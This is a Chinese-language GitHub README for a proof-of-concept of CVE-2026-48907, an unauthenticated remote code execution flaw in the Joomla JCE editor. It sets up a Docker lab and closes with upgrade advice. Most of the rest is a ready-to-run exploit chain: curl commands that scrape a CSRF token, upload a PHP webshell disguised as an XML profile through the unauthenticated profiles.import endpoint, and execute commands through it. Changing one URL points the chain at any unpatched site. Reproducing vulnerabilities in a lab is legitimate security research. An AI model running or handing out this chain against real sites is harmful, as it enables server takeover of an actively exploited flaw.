pssec-io/CVE-2026-48907
GitHub: pssec-io/CVE-2026-48907
针对 Joomla JCE 编辑器 CVE-2026-48907 未授权远程代码执行漏洞的 PoC 项目,提供 Docker 实验环境和完整的漏洞利用复现流程。
Stars: 0 | Forks: 0
# CVE-2026-48907 — Joomla JCE 未授权 RCE 实验环境
## 概述
**CVE-2026-48907** 是 **JCE (Joomla Content Editor)** 中一个极其严重的 (CVSS 10.0) 未授权远程代码执行漏洞。JCE 是 Joomla 中安装最广泛的编辑器扩展,此漏洞影响所有 **≤ 2.9.99.4** 版本。
`profiles.import` 端点接受无需任何身份验证的文件上传。攻击者可以上传伪装成 XML 配置文件的恶意 PHP 文件,该文件会被写入服务器的 `tmp/` 目录,并通过 HTTP 直接执行——完全不需要任何凭据。
| 详情 | 值 |
|---|---|
| **CVE** | CVE-2026-48907 |
| **CVSS 评分** | 10.0 严重 |
| **受影响版本** | JCE ≤ 2.9.99.4 |
| **修复版本** | JCE ≥ 2.9.99.5 |
| **CISA KEV 收录** | 是 — 2026 年 6 月 16 日 |
| **是否被积极利用** | 是 |
## 实验环境搭建
### 前置条件
- Docker + Docker Compose
- Kali Linux(或任何 Linux 主机)
### 1. 启动易受攻击的环境
```
docker compose up -d
```
### 2. 完成 Joomla 安装程序
在浏览器中打开 `http://localhost:8080` 并使用以下凭据完成安装向导:
| 字段 | 值 |
|---|---|
| 数据库主机 | `db` |
| 数据库名称 | `joomla` |
| 数据库用户 | `joomla` |
| 数据库密码 | `joomlapass` |
### 3. 安装存在漏洞的 JCE 扩展
```
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip
```
然后在 Joomla 管理后台 → **系统 → 扩展 → 安装** → 上传该 ZIP 文件。
## 漏洞利用
### 4. 提取 CSRF token 和 session cookie
```
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
| sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
| head -n1)
```
### 5. 通过未授权的配置文件导入上传 PHP webshell
```
curl -i -s -b cookies.txt -c cookies.txt \
-F "profile_file=@shell.xml.php;type=application/xml" \
-F "task=profiles.import" \
-F "${TOKEN}=1" \
"$URL/index.php?option=com_jce"
```
### 6. 验证远程代码执行
```
curl -i -s -b cookies.txt -c cookies.txt \
"$URL/tmp/shell.xml.php?cmd=id"
```
预期输出:`uid=33(www-data) gid=33(www-data)`
## 文件
| 文件 | 描述 |
|---|---|
| `docker-compose.yml` | 启动存在漏洞的 Joomla 5.3.1 + MySQL 8.0 |
| `shell.xml.php` | 最小化的 PHP webshell payload |
| `instructions.txt` | 逐步的漏洞利用说明 |
## 修复方案
立即将 JCE 更新至 **2.9.99.5 或更高版本**。
针对旧版 Joomla 的官方供应商安全通告和免费补丁:
**[JCE 安全更新 — joomlacontenteditor.net](https://www.joomlacontenteditor.net/news/jce-security-update-and-a-free-patch-for-older-sites)**
## 免责声明
*由 [PSsec](https://pssec.io)* 提供
标签:CISA项目, Cutter, ffuf, Joomla, PoC, Web安全, 暴力破解, 版权保护, 编程工具, 蓝队分析, 请求拦截, 远程代码执行